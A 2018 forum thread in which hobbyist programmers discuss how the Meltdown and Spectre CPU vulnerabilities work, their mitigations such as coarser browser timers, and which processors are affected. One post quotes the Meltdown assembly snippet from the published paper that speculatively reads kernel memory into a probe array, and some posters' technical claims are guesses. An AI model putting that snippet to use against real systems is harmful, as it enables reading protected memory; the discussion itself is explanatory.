It is currently Sun Feb 25, 2018 4:46 am

All times are UTC - 7 hours





Post new topic Reply to topic  [ 27 posts ]  Go to page 1, 2  Next
Author Message
 Post subject: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 7:33 am 
Offline
User avatar

Joined: Fri Nov 19, 2004 7:35 pm
Posts: 4003
Does anyone understand how this works? I understand Meltdown fine, but I have no idea what Spectre is supposed to be. Can anyone explain it?

_________________
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 7:39 am 
Offline
User avatar

Joined: Fri Nov 12, 2004 2:49 pm
Posts: 7376
Location: Chexbres, VD, Switzerland
To be honest I didn't understand either bug, despite throwing a few hours at them. My understanding they exploit/abuse how branch prediction works and can retrieve data they should not be able to by doing an "if () " reading illegal memory, and measuring time it takes until the exception popus up. The bug is inherent to hardware so the only way to not have it would be to discard branch prediction or not having a reliable timer.

Now, how could nobody think about this between 1995-2017, and wait 6 more month before publishing it until janauary 2018, I really wonder - even though personally I wouldn't have thought of it.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 7:55 am 
Offline
User avatar

Joined: Fri Nov 19, 2004 7:35 pm
Posts: 4003
Meltdown makes perfect sense. The code snippet from the pdf is very easy to follow:
Code:
 ; rcx = kernel address
 ; rbx = probe array
retry:
 mov al, byte [rcx]
 shl rax, 0xc
 jz retry
 mov rbx, qword [rbx + rax]

The byte fetch will trigger an exception, but due to the flaw, it has already gone ahead and done the read into the probe array, so it now cached. Even though the values are discarded, they were still used.

I saw the Youtube video demonstrating dumping kernel memory, so you can see that it clearly works.

Meltdown is easy to follow since it's in the same address space as the process. But Spectre remains a mystery to me.

_________________
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 11:12 am 
Offline
User avatar

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.

Spectre on the other hand seems to be a new area of vulnerability for exploiting existing programs. Like how an unchecked array bound in a program might leave you with a way to exploit it, now that we're aware of ways to manipulate and time branch prediction via the cache, a checked bound is vulnerable too if you can get it to mispredict the branch and do the array access anyway.

Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.

At least, that's the gist of what I got from this whitepaper:
https://spectreattack.com/spectre.pdf


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 11:33 am 
Offline
User avatar

Joined: Fri Nov 19, 2004 7:35 pm
Posts: 4003
So spectre basically requires scripting or other ways of executing code within another process? Got it.

Seems like it would be useful for exploiting web browsers to find out the address layout before going to ROP.

_________________
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 11:44 am 
Offline

Joined: Sun Apr 13, 2008 11:12 am
Posts: 6814
Location: Seattle
Both flaws require the ability to run arbitrary but jailed code on the target CPU.

Both flaws involve the same ultimate failure: reading memory that you're "supposed" to not be able to. Meltdown's "just" the version that compromises the read protection guarantees made by the page table.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 12:41 pm 
Offline
User avatar

Joined: Thu Mar 31, 2016 11:15 am
Posts: 279
Dwedit wrote:
So spectre basically requires scripting or other ways of executing code within another process? Got it.


It's less restrictive than that. If you have a sequence of bytes you want to run and that sequence of bytes happens to exist in the program's address space, you can train the branch predictor from outside the program to jump there and execute it speculatively. And since speculative execution touches the cache, it can be used to leak information.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 2:07 pm 
Offline
User avatar

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
The prognosis I've understood is that Meltdown can be corrected by having the OS take protective measures with its kernel paging, at some performance cost. Spectre is more insidious, since it operates from within a program in its own space, and exploits very normal and extremely common code (e.g. jump tables, bounded array lookups, etc.). Not something that can really be patched directly, or that most software developers could even try to prevent, but probably browsers and other critical stuff can be vigilant in addressing known attacks as they appear. A hydra monster always growing new heads.

I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P

(Also, the Spectre attacks work on most CPUs, not just Intel design?)


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 3:01 pm 
Offline

Joined: Sun Apr 13, 2008 11:12 am
Posts: 6814
Location: Seattle
Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.

Meltdown, for whatever it's worth, doesn't only affect Intel's CPU. It's just that Intel was the only corporation to consistently put the permissions check on the wrong (i.e. higher performance) side of the L1 cache fetch. But there's a reason why the newest highest-performing ARM cores are also vulnerable. I think I remember reading it being true of several markedly older POWER cores, too.

There's a fascinating article that came up in the wake of these revelations about the PowerPC core in the Xbox 360 and its cache-coherency-violating XDCBT instruction.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 3:50 pm 
Offline
User avatar

Joined: Fri Nov 12, 2004 2:49 pm
Posts: 7376
Location: Chexbres, VD, Switzerland
rainwarrior wrote:
I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.

Also my understanding is that Spectre is more like a family of possible exploits, while Meltdown is a particular implementation of such an exploit that actually works. I might be wrong.

Quote:
Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.

So in my understanding for Spectre to work you need a very specific CPU *and* a very specific version of a very specific program, with programs constantly updating every week it needs the exploit has to be updated as well to take account for new low-level code; also it only allows for spying data on one person's computer which is indeed problematic but Google already does that for everyone using Chrome or any Google-related website so it's nothing new - it doesn't allow to write to memory so to actually implement malware.
Quote:
Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.

My understanding is that you acess data not by reading it directly, but by measure time it takes to read it, and see whether it was a cache hit or miss, so data is "read" one bit at a time, and some kind of timer is probably used to measure this time. If the timer is made innacurate enough so that it can't distinguish accurately the difference between a cache hit or a cache miss, then data can't be retreived accurately and the exploit is impossible, even if speculative execution is still enabled. Even in current state I think there is some bits which are sometimes read wrongly, as I have seen a video drawing a cat picture with spectre, and there was some random noise on the picture. So just fixing timer to be innacurate might solve the issue.

Quote:
I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P

Or AMD ;P

(By the way Intel Itanium processors seems to be unaffected because they lack hardware speculative execution, which is mostly done compile time)


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 4:27 pm 
Offline
User avatar

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
It doesn't need to be quite that specific, I don't think. Your exploiting program can actually search for the needed code fragments to exploit (and you can even use stuff in shared DLLs). I think you need to know something about the program to find an opening in the first place, but I think it'd be tough to sanitize a big API like javascript. There's probably clever ways to prevent a lot of it, but it seems like there are a lot of open holes.

As for timers, you can always repeat the tests to get around timer accuracy. It doesn't close the hole, just reduces bandwidth? That might actually be one of the things browsers have currently disabled in response, though there might be multiple ways to create effective timers?

Edit: Yes, it looks like exactly that was done. https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/


Then again, I'm surprised that I haven't yet seen news of this thing in action. Just research demos. Where's the spectre supervirus? Maybe we're lucky and its too hard to use effectively?


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 6:28 pm 
Offline

Joined: Sun Apr 13, 2008 11:12 am
Posts: 6814
Location: Seattle
Both Spectre and Meltdown are "only" (n.b. scare quotes; I don't mean to imply this isn't a serious problem) useful for exfiltration. Meltdown lets you bypass kASLR ... if you have an attack that would have been hampered by having to find entry points. Spectre lets you use javascript to read sensitive data out of another web browser tab ... if the attackee has sensitive data to read.

Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack. It just makes that attack easier.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 6:34 pm 
Offline

Joined: Sun Sep 19, 2004 11:12 pm
Posts: 19675
Location: NE Indiana, USA (NTSC)
lidnariq wrote:
Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack.

Your password manager, your cryptocurrency wallets, and your PGP and SSH private keys, for a start. Someone who can SSH in can install ransomware.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 6:48 pm 
Offline
User avatar

Joined: Sun Jan 22, 2012 12:03 pm
Posts: 6041
Location: Canada
Seeing news today about bitcoin miners slipping into YouTube ads doesn't fill me with hope. :(
https://arstechnica.com/information-technology/2018/01/now-even-youtube-serves-ads-with-cpu-draining-cryptocurrency-miners/

Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.


Top
 Profile  
 
 Post subject: Re: Intel Spectre bug?
PostPosted: Fri Jan 26, 2018 8:09 pm 
Offline

Joined: Sat Apr 25, 2015 1:47 pm
Posts: 356
Location: FL
rainwarrior wrote:
Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.

And this is exactly why ad blockers are such a valuable anti-malware tool.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 27 posts ]  Go to page 1, 2  Next

All times are UTC - 7 hours


Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Group